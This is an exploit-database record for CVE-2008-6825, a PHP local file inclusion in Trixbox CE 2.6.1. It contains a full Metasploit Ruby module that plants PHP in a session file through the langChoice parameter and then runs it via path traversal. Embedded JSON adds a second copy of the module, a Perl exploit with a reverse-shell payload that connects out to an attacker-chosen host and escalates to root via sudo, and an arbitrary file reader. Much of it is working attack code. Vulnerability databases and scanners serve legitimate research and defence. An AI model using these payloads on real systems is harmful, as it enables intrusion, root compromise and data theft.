ID EDB-ID:16904
Type exploitdb
Reporter metasploit
Modified 2011-01-08T00:00:00
Description
Trixbox langChoice PHP Local File Inclusion. CVE-2008-6825. Webapps exploit for php platform
##
# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
# -*- coding: utf-8 -*-
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\w+)(?:;|$)/
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Trixbox langChoice PHP Local File Inclusion',
'Description' => %q{
This module injects php into the trixbox session file and then, in a second call, evaluates
that code by manipulating the langChoice parameter as described in OSVDB-50421.
},
'Author' => ['chao-mu'],
'License' => BSD_LICENSE,
'Version' => '$Revision: 11516 $',
'References' =>
[
['OSVDB' => '50421'],
['CVE' => '2008-6825'],
['BID' => '30135'],
['URL' => 'http://www.exploit-db.com/exploits/6026/'],
['URL' => 'http://www.trixbox.org/']
],
'Payload' =>
{
# max header length for Apache (8190),
# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
# minus 23 for good luck (and extra spacing)
'Space' => 8190 - 23,
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'BadChars' => "'\"`" # quotes are escaped by PHP's magic_quotes_gpc in a default install
},
'Targets' => [['trixbox CE 2.6.1', {}]],
'DefaultTarget' => 0,
'Platform' => 'php',
'Arch' => ARCH_PHP,
'DisclosureDate' => 'Jul 09 2008'
))
register_options(
[
OptString.new('URI', [true, 'The uri that accepts the langChoice param', '/user/index.php']),
OptString.new('PATH', [true, 'The path where the php was stored', '../../../../../../../../../../tmp/sess_!SESSIONID!%00']),
], self.class)
end
def check
# We need to ensure that this can be reached via POST
uri = datastore['URI']
target_code = 200
print_status "Attempting to POST to #{uri}"
response = send_request_cgi({'uri' => uri, 'method' => 'POST'})
unless defined? response
print_error 'Server did not respond to HTTP POST request'
return Exploit::CheckCode::Safe
end
code = response.code
unless code == target_code
print_error "Expected HTTP code #{target_code}, but got #{code}."
return Exploit::CheckCode::Safe
end
print_status "We received the expected HTTP code #{target_code}"
# We will need the cookie PHPSESSID to continue
cookies = response.headers['Set-Cookie']
# Make sure cookies were set
if defined? cookies and cookies =~ PHPSESSID_REGEX
print_status "We were successfully sent a PHPSESSID of '#{$1}'"
else
print_error 'The server did not send us the cookie we were looking for'
return Exploit::CheckCode::Safe
end
# Okay, at this point we're just being silly and hackish.
unless response.body =~ /langChoice/
print_error 'The page does not appear to contain a langChoice field'
return Exploit::CheckCode::Safe
end
# XXX: Looking for a good way of determine if it is NOT trixbox
# unless response.body.match(/trixbox - User Mode/)
# print_status 'The target does not appear to be running trixbox'
# return Exploit::CheckCode::Safe
# end
# print_status 'The target appears to be running trixbox'
# If it has the target footer, we know its vulnerable
# however skining may mean the reverse is not true
# We've only tested on v2.6.1, so that is all we will guarantee
# Example footer: v2.6.1 Š2008 Fonality
# if response.body =~ /(v2\.(?:[0-5]\.\d|6\.[0-1]))\s{2}©200[0-8] Fonality/
if response.body =~ /(v2\.6\.1)\s{2}©2008 Fonality/
print_status "Trixbox #{$1} detected!"
return Exploit::CheckCode::Vulnerable
end
print_status 'The target may be skinned making detection too difficult'
if response.body =~ /trixbox - User Mode/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end
def exploit
# We will be be passing this our langChoice values
uri = datastore['URI']
# Prepare PHP file contents
encoded_php_file = Rex::Text.uri_encode("<?php #{payload.encoded} ?>")
# Deliver the payload
print_status('Uploading the payload to the remote server')
delivery_response = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'data' => "langChoice=#{encoded_php_file}%00"
})
# The call should return status code 200
if delivery_response.code != 200
raise RuntimeError, "Server returned unexpected HTTP code #{delivery_response.code}"
end
print_status "The server responded to POST with HTTP code #{delivery_response.code}"
# We will need the cookie PHPSESSID to continue
cookies = delivery_response.headers['Set-Cookie']
# Make sure cookies were set
if cookies.nil?
raise RuntimeError, 'The server did not set any cookies'
end
# Contents of PHPSESSID. About to be set.
session_id = nil
# Retrieve the session id from PHPSESSID
if cookies =~ PHPSESSID_REGEX
session_id = $1
else
raise RuntimeError, 'The cookie PHPSESSID was not set.'
end
print_status "We were assigned a session id (cookie PHPSESSID) of '#{session_id}'"
# Prepare the value that will execute our payload
detonation = datastore['PATH'].sub('!SESSIONID!', session_id)
print_status "We will use '#{detonation}' as the value of langChoice to detonate the payload"
# Request the detonation uri, detonating the payload
print_status 'Attempting to detonate. You will need to clean /tmp/ yourself.'
# Small timeout as we're just going to assume we succeeded.
send_request_cgi({
'uri' => uri,
'cookie' => cookies,
'method' => 'POST',
'data' => "langChoice=#{detonation}%00"
}, 0.01)
handler
end
end
{"id": "EDB-ID:16904", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Trixbox CE 2.6.1 - langChoice PHP Local File Inclusion", "description": "Trixbox langChoice PHP Local File Inclusion. CVE-2008-6825. Webapps exploit for php platform", "published": "2011-01-08T00:00:00", "modified": "2011-01-08T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16904/", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2008-6825"], "lastseen": "2016-02-02T06:47:19", "viewCount": 3, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-02T06:47:19", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6825"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/TRIXBOX_LANGCHOICE"]}, {"type": "nessus", "idList": ["TRIXBOX_LANGCHOICE_FILE_INCLUDE.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:6026"]}], "modified": "2016-02-02T06:47:19", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://www.exploit-db.com/download/16904/", "sourceData": "##\r\n# $Id: trixbox_langchoice.rb 11516 2011-01-08 01:13:26Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n# -*- coding: utf-8 -*-\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ManualRanking\r\n\r\n\tPHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\\w+)(?:;|$)/\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Trixbox langChoice PHP Local File Inclusion',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module injects php into the trixbox session file and then, in a second call, evaluates\r\n\t\t\t\tthat code by manipulating the langChoice parameter as described in OSVDB-50421.\r\n\t\t\t},\r\n\t\t\t'Author' => ['chao-mu'],\r\n\t\t\t'License' => BSD_LICENSE,\r\n\t\t\t'Version' => '$Revision: 11516 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['OSVDB' => '50421'],\r\n\t\t\t\t\t['CVE' => '2008-6825'],\r\n\t\t\t\t\t['BID' => '30135'],\r\n\t\t\t\t\t['URL' => 'http://www.exploit-db.com/exploits/6026/'],\r\n\t\t\t\t\t['URL' => 'http://www.trixbox.org/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t# max header length for Apache (8190),\r\n\t\t\t\t\t# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize\r\n\t\t\t\t\t# minus 23 for good luck (and extra spacing)\r\n\t\t\t\t\t'Space' => 8190 - 23,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'ConnectionType' => 'find',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t'BadChars' => \"'\\\"`\" # quotes are escaped by PHP's magic_quotes_gpc in a default install\r\n\t\t\t\t},\r\n\t\t\t'Targets' => [['trixbox CE 2.6.1', {}]],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'Platform' => 'php',\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'DisclosureDate' => 'Jul 09 2008'\r\n\t\t))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('URI', [true, 'The uri that accepts the langChoice param', '/user/index.php']),\r\n\t\t\t\tOptString.new('PATH', [true, 'The path where the php was stored', '../../../../../../../../../../tmp/sess_!SESSIONID!%00']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\t# We need to ensure that this can be reached via POST\r\n\t\turi = datastore['URI']\r\n\t\ttarget_code = 200\r\n\r\n\t\tprint_status \"Attempting to POST to #{uri}\"\r\n\t\tresponse = send_request_cgi({'uri' => uri, 'method' => 'POST'})\r\n\r\n\t\tunless defined? response\r\n\t\t\tprint_error 'Server did not respond to HTTP POST request'\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tcode = response.code\r\n\r\n\t\tunless code == target_code\r\n\t\t\tprint_error \"Expected HTTP code #{target_code}, but got #{code}.\"\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tprint_status \"We received the expected HTTP code #{target_code}\"\r\n\r\n\t\t# We will need the cookie PHPSESSID to continue\r\n\t\tcookies = response.headers['Set-Cookie']\r\n\r\n\t\t# Make sure cookies were set\r\n\t\tif defined? cookies and cookies =~ PHPSESSID_REGEX\r\n\t\t\tprint_status \"We were successfully sent a PHPSESSID of '#{$1}'\"\r\n\t\telse\r\n\t\t\tprint_error 'The server did not send us the cookie we were looking for'\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\t# Okay, at this point we're just being silly and hackish.\r\n\t\tunless response.body =~ /langChoice/\r\n\t\t\tprint_error 'The page does not appear to contain a langChoice field'\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\t# XXX: Looking for a good way of determine if it is NOT trixbox\r\n\t\t# unless response.body.match(/trixbox - User Mode/)\r\n\t\t# \tprint_status 'The target does not appear to be running trixbox'\r\n\t\t# \treturn Exploit::CheckCode::Safe\r\n\t\t# end\r\n\t\t# print_status 'The target appears to be running trixbox'\r\n\r\n\t\t# If it has the target footer, we know its vulnerable\r\n\t\t# however skining may mean the reverse is not true\r\n\t\t# We've only tested on v2.6.1, so that is all we will guarantee\r\n\t\t# Example footer: v2.6.1 \u00c2\u01602008 Fonality\r\n#\t\tif response.body =~ /(v2\\.(?:[0-5]\\.\\d|6\\.[0-1]))\\s{2}©200[0-8] Fonality/\r\n\t\tif response.body =~ /(v2\\.6\\.1)\\s{2}©2008 Fonality/\r\n\t\t\tprint_status \"Trixbox #{$1} detected!\"\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tprint_status 'The target may be skinned making detection too difficult'\r\n\r\n\t\tif response.body =~ /trixbox - User Mode/\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\telse\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# We will be be passing this our langChoice values\r\n\t\turi = datastore['URI']\r\n\r\n\t\t# Prepare PHP file contents\r\n\t\tencoded_php_file = Rex::Text.uri_encode(\"<?php #{payload.encoded} ?>\")\r\n\r\n\t\t# Deliver the payload\r\n\t\tprint_status('Uploading the payload to the remote server')\r\n\t\tdelivery_response = send_request_cgi({\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'data' => \"langChoice=#{encoded_php_file}%00\"\r\n\t\t\t})\r\n\r\n\t\t# The call should return status code 200\r\n\t\tif delivery_response.code != 200\r\n\t\t\traise RuntimeError, \"Server returned unexpected HTTP code #{delivery_response.code}\"\r\n\t\tend\r\n\r\n\t\tprint_status \"The server responded to POST with HTTP code #{delivery_response.code}\"\r\n\r\n\t\t# We will need the cookie PHPSESSID to continue\r\n\t\tcookies = delivery_response.headers['Set-Cookie']\r\n\r\n\t\t# Make sure cookies were set\r\n\t\tif cookies.nil?\r\n\t\t\traise RuntimeError, 'The server did not set any cookies'\r\n\t\tend\r\n\r\n\t\t# Contents of PHPSESSID. About to be set.\r\n\t\tsession_id = nil\r\n\r\n\t\t# Retrieve the session id from PHPSESSID\r\n\t\tif cookies =~ PHPSESSID_REGEX\r\n\t\t\tsession_id = $1\r\n\t\telse\r\n\t\t\traise RuntimeError, 'The cookie PHPSESSID was not set.'\r\n\t\tend\r\n\r\n\t\tprint_status \"We were assigned a session id (cookie PHPSESSID) of '#{session_id}'\"\r\n\r\n\t\t# Prepare the value that will execute our payload\r\n\t\tdetonation = datastore['PATH'].sub('!SESSIONID!', session_id)\r\n\r\n\t\tprint_status \"We will use '#{detonation}' as the value of langChoice to detonate the payload\"\r\n\r\n\t\t# Request the detonation uri, detonating the payload\r\n\t\tprint_status 'Attempting to detonate. You will need to clean /tmp/ yourself.'\r\n\r\n\t\t# Small timeout as we're just going to assume we succeeded.\r\n\t\tsend_request_cgi({\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t\t'cookie' => cookies,\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'data' => \"langChoice=#{detonation}%00\"\r\n\t\t\t}, 0.01)\r\n\r\n\t\thandler\r\n\tend\r\nend\r\n", "osvdbidlist": ["50421"]}
{"cve": [{"lastseen": "2020-12-09T19:28:28", "description": "Directory traversal vulnerability in user/index.php in Fonality trixbox CE 2.6.1 and earlier allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the langChoice parameter.", "edition": 5, "cvss3": {}, "published": "2009-06-05T21:30:00", "title": "CVE-2008-6825", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6825"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:trixbox:trixbox:2.6.1", "cpe:/a:trixbox:trixbox:2.4.2.0", "cpe:/a:trixbox:trixbox:2.0"], "id": "CVE-2008-6825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6825", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:trixbox:trixbox:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:trixbox:trixbox:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:trixbox:trixbox:2.4.2.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T23:03:32", "description": "trixbox (langChoice) Local File Inclusion Exploit (connect-back) v2. CVE-2008-6825. Remote exploit for linux platform", "published": "2008-07-09T00:00:00", "type": "exploitdb", "title": "trixbox langChoice - Local File Inclusion Exploit connect-back 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6825"], "modified": "2008-07-09T00:00:00", "id": "EDB-ID:6026", "href": "https://www.exploit-db.com/exploits/6026/", "sourceData": "#!/usr/bin/perl -w\r\n\r\n# Jean-Michel BESNARD <jmbesnard@gmail.com> / LEXSI Audit\r\n# 2008-07-09\r\n# This is an update of the previous exploit. We can now get a root shell, thanks to sudo.\r\n#\r\n# perl trixbox_fi_v2.pl 192.168.1.212\r\n# Please listen carefully as our menu option has changed\r\n# Choose from the following options:\r\n# 1> Remote TCP shell\r\n# 2> Read local file\r\n# 1\r\n# Host and port the reverse shell should connect to ? (<host>:<port>): 192.168.1.132:4444\r\n# Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]\r\n# root\r\n# Make sure you've opened a server socket on port 4444 at 192.168.1.132 (e.g, nc -l -p 4444)\r\n# Press enter to continue...\r\n# done...\r\n\r\n# nc -l -v -p 4444\r\n# listening on [any] 4444 ...\r\n# connect to [192.168.1.132] from lexsi-abo-new.lexsi.com [192.168.1.212] 48397\r\n# bash: no job control in this shell\r\n# bash-3.1# id\r\n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n# bash-3.1# \r\n\r\n\r\nuse strict;\r\nuse Switch;\r\nuse LWP::UserAgent;\r\nuse HTTP::Cookies;\r\n\r\nusage() unless @ARGV;\r\nmy $url = \"http://$ARGV[0]/user/index.php\";\r\nmy $ua = LWP::UserAgent->new;\r\nmy $cookie_jar = HTTP::Cookies->new;\r\n$ua->cookie_jar($cookie_jar);\r\n\r\nmenu();\r\n\r\nsub execScript{\r\n my $scriptCode = shift;\r\n post($scriptCode);\r\n my $phpsessionid = extractPHPSID($cookie_jar->as_string);\r\n post(\"langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00\");\r\n}\r\n\r\nsub post{\r\n my $postData = shift;\r\n my $req = HTTP::Request->new(POST => $url);\r\n $req->content_type('application/x-www-form-urlencoded');\r\n $req->content($postData);\r\n my $res = $ua->request($req);\r\n my $content = $res->content;\r\n return $content;\r\n}\r\n\r\nsub readFile{\r\n my $file = shift;\r\n my $content = post(\"langChoice=../../../../../../../../../..$file%00\");\r\n my @fileLines = split(/\\n/,$content);\r\n my $fileContent = \"Content of $file: \\n\\n\";\r\n for(my $i=3;$i<@fileLines;$i++){\r\n\tlast if($fileLines[$i] =~ m/trixbox - User Mode/);\r\n\t$fileContent = $fileContent . $fileLines[$i-3] . \"\\n\";\r\n }\r\n return $fileContent;\r\n}\r\n\r\nsub tcp_reverse_shell{\r\n my $rhost= shift;\r\n my $rport = shift;\r\n my $uid = shift;\r\n my $rshell;\r\n if($uid eq \"asterisk\"){\r\n\t$rshell = \"langChoice=<?php `/usr/bin/perl -MSocket -e '\\\\\\$p=fork;exit,if(\\\\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\\\"$rhost\\\")));open(STDIN, \\\">%26S\\\");open(STDOUT,\\\">%26S\\\");open(STDERR,\\\">%26S\\\");exec({\\\"/bin/sh\\\"} (\\\"JMB\\\", \\\"-i\\\"));'`;?>%00\";\r\n\r\n }else{\r\n\t$rshell = \"langChoice=<?php `/usr/bin/perl -MSocket -e '\\\\\\$p=fork;exit,if(\\\\\\$p);socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp'));connect(S, sockaddr_in($rport,inet_aton(\\\"$rhost\\\")));open(STDIN, \\\">%26S\\\");open(STDOUT,\\\">%26S\\\");open(STDERR,\\\">%26S\\\");exec(\\\"/usr/bin/sudo\\\",\\\"/bin/bash\\\", (\\\"-i\\\"));'`;?>%00\";\r\n }\r\n execScript($rshell);\r\n}\r\n\r\n\r\nsub extractPHPSID{\r\n $_ = shift;\r\n if(/PHPSESSID=(\\w+)/){\r\n\treturn $1;\r\n } \r\n}\r\n\r\nsub menu{\r\n print <<EOF;\r\nPlease listen carefully as our menu option has changed\r\nChoose from the following options:\r\n 1> Remote TCP shell\r\n 2> Read local file\r\nEOF\r\n my $option = <STDIN>;\r\n chop($option);\r\n switch($option){\r\n\tcase 1 {\r\n\t print \"Host and port the reverse shell should connect to ? \";\r\n\t print \"(<host>:<port>): \";\r\n\t my $hp=<STDIN>;\r\n\t chop($hp);\r\n\t print \"Which uid would you like for your shell ? (uid=root will be OK on most recent trixbox versions only): [root|asterisk]\";\r\n\t my $uid=<STDIN>;\r\n\t chop($uid);\r\n\t my($rhost,$rport) = split(/:/,$hp);\r\n\t print \"Make sure you've opened a server socket on port $rport at $rhost (e.g, nc -l -p $rport)\\n\";\r\n\t print \"Press enter to continue...\";\r\n\t <STDIN>;\r\n\t tcp_reverse_shell($rhost,$rport,$uid);\r\n\t print \"done...\\n\";\r\n\t }\r\n\tcase 2 {\r\n\t while(1){\r\n\t\tprint \"Full path (e.g. /etc/passwd): \";\r\n\t\tmy $file = <STDIN>;\r\n\t\tchop($file);\r\n\t\tprint readFile($file) . \"\\n\\n\";\r\n\t }\r\n\t}\r\n }\r\n}\r\n\r\nsub usage{\r\n print \"./trixbox_fi.pl <host>\\n\";\r\n exit 1;\r\n}\r\n\r\n# milw0rm.com [2008-07-09]\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6026/"}], "metasploit": [{"lastseen": "2020-07-02T02:35:54", "description": "This module injects php into the trixbox session file and then, in a second call, evaluates that code by manipulating the langChoice parameter as described in OSVDB-50421.\n", "published": "2010-12-07T17:44:47", "type": "metasploit", "title": "Trixbox langChoice PHP Local File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6825"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/UNIX/WEBAPP/TRIXBOX_LANGCHOICE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# -*- coding: utf-8 -*-\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n PHPSESSID_REGEX = /(?:^|;?)PHPSESSID=(\\w+)(?:;|$)/\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Trixbox langChoice PHP Local File Inclusion',\n 'Description' => %q{\n This module injects php into the trixbox session file and then, in a second call, evaluates\n that code by manipulating the langChoice parameter as described in OSVDB-50421.\n },\n 'Author' => ['chao-mu'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['OSVDB', '50421'],\n ['CVE', '2008-6825'],\n ['BID', '30135'],\n ['EDB', '6026' ],\n ['URL', 'http://www.trixbox.org/']\n ],\n 'Payload' =>\n {\n # max header length for Apache (8190),\n # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize\n # minus 23 for good luck (and extra spacing)\n 'Space' => 8190 - 23,\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'ConnectionType' => 'find',\n },\n 'BadChars' => \"'\\\"`\" # quotes are escaped by PHP's magic_quotes_gpc in a default install\n },\n 'Targets' => [['trixbox CE 2.6.1', {}]],\n 'DefaultTarget' => 0,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'DisclosureDate' => 'Jul 09 2008'\n ))\n\n register_options(\n [\n OptString.new('URI', [true, 'The uri that accepts the langChoice param', '/user/index.php']),\n OptString.new('PATH', [true, 'The path where the php was stored', '../../../../../../../../../../tmp/sess_!SESSIONID!%00']),\n ])\n end\n\n def check\n # We need to ensure that this can be reached via POST\n uri = normalize_uri(datastore['URI'])\n target_code = 200\n\n vprint_status \"Attempting to POST to #{uri}\"\n response = send_request_cgi({'uri' => uri, 'method' => 'POST'})\n\n unless defined? response\n vprint_error 'Server did not respond to HTTP POST request'\n return Exploit::CheckCode::Unknown\n end\n\n code = response.code\n\n unless code == target_code\n vprint_error \"Expected HTTP code #{target_code}, but got #{code}.\"\n return Exploit::CheckCode::Safe\n end\n\n vprint_status \"We received the expected HTTP code #{target_code}\"\n\n # We will need the cookie PHPSESSID to continue\n cookies = response.get_cookies\n\n # Make sure cookies were set\n if defined? cookies and cookies =~ PHPSESSID_REGEX\n vprint_good \"We were successfully sent a PHPSESSID of '#{$1}'\"\n else\n vprint_error 'The server did not send us the cookie we were looking for'\n return Exploit::CheckCode::Safe\n end\n\n # Okay, at this point we're just being silly and hackish.\n unless response.body =~ /langChoice/\n vprint_error 'The page does not appear to contain a langChoice field'\n return Exploit::CheckCode::Safe\n end\n\n # XXX: Looking for a good way of determine if it is NOT trixbox\n # unless response.body.match(/trixbox - User Mode/)\n # \tprint_status 'The target does not appear to be running trixbox'\n # \treturn Exploit::CheckCode::Safe\n # end\n # print_status 'The target appears to be running trixbox'\n\n # If it has the target footer, we know its vulnerable\n # however skining may mean the reverse is not true\n # We've only tested on v2.6.1, so that is all we will guarantee\n # Example footer: v2.6.1 ©2008 Fonality\n#\t\tif response.body =~ /(v2\\.(?:[0-5]\\.\\d|6\\.[0-1]))\\s{2}©200[0-8] Fonality/\n if response.body =~ /(v2\\.6\\.1)\\s{2}©2008 Fonality/\n vprint_status \"Trixbox #{$1} detected!\"\n return Exploit::CheckCode::Appears\n end\n\n vprint_status 'The target may be skinned making detection too difficult'\n\n if response.body =~ /trixbox - User Mode/\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n # We will be be passing this our langChoice values\n uri = normalize_uri(datastore['URI'])\n\n # Prepare PHP file contents\n encoded_php_file = Rex::Text.uri_encode(\"<?php #{payload.encoded} ?>\")\n\n # Deliver the payload\n print_status('Uploading the payload to the remote server')\n delivery_response = send_request_cgi({\n 'uri' => uri,\n 'method' => 'POST',\n 'data' => \"langChoice=#{encoded_php_file}%00\"\n })\n\n # The call should return status code 200\n if delivery_response.code != 200\n fail_with(Failure::NotFound, \"Server returned unexpected HTTP code #{delivery_response.code}\")\n end\n\n print_status \"The server responded to POST with HTTP code #{delivery_response.code}\"\n\n # We will need the cookie PHPSESSID to continue\n cookies = delivery_response.get_cookies\n\n # Make sure cookies were set\n if cookies.nil?\n fail_with(Failure::NotFound, 'The server did not set any cookies')\n end\n\n # Contents of PHPSESSID. About to be set.\n session_id = nil\n\n # Retrieve the session id from PHPSESSID\n if cookies =~ PHPSESSID_REGEX\n session_id = $1\n else\n fail_with(Failure::NotFound, 'The cookie PHPSESSID was not set.')\n end\n\n print_status \"We were assigned a session id (cookie PHPSESSID) of '#{session_id}'\"\n\n # Prepare the value that will execute our payload\n detonation = datastore['PATH'].sub('!SESSIONID!', session_id)\n\n print_status \"We will use '#{detonation}' as the value of langChoice to detonate the payload\"\n\n # Request the detonation uri, detonating the payload\n print_status 'Attempting to detonate. You will need to clean /tmp/ yourself.'\n\n # Small timeout as we're just going to assume we succeeded.\n send_request_cgi({\n 'uri' => uri,\n 'cookie' => cookies,\n 'method' => 'POST',\n 'data' => \"langChoice=#{detonation}%00\"\n }, 0.01)\n\n handler\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/trixbox_langchoice.rb"}], "nessus": [{"lastseen": "2021-01-20T15:18:49", "description": "The version of trixbox dashboard installed on the remote host fails to\nsanitize user-supplied input to the 'langChoice' parameter of the\n'user/index.php' script before using it to include PHP code.\nRegardless of PHP's 'register_globals' setting, an unauthenticated\nattacker could leverage this issue to view arbitrary files or to\nexecute arbitrary PHP code on the remote host, subject to the\nprivileges of the web server user id.", "edition": 28, "published": "2008-07-09T00:00:00", "title": "trixbox Dashboard user/index.php langChoice Parameter Local File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6825"], "modified": "2008-07-09T00:00:00", "cpe": ["cpe:/a:fonality:trixbox"], "id": "TRIXBOX_LANGCHOICE_FILE_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/nessus/33445", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33445);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2008-6825\");\n script_bugtraq_id(30135);\n script_xref(name:\"EDB-ID\", value:\"6026\");\n\n script_name(english:\"trixbox Dashboard user/index.php langChoice Parameter Local File Inclusion\");\n script_summary(english:\"Tries to read /etc/passwd\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP script that is susceptible to a\nlocal file include attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of trixbox dashboard installed on the remote host fails to\nsanitize user-supplied input to the 'langChoice' parameter of the\n'user/index.php' script before using it to include PHP code.\nRegardless of PHP's 'register_globals' setting, an unauthenticated\nattacker could leverage this issue to view arbitrary files or to\nexecute arbitrary PHP code on the remote host, subject to the\nprivileges of the web server user id.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2008/Jul/102\");\n # http://web.archive.org/web/20090525044133/http://trixbox.org/devblog/security-vulnerability-2-6-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c891c97\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Versions 2.6.1 and prior are reportedly affected by the issue\nreferenced above. Consequently, refer to the vendor for patch and/or\nupgrade options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n 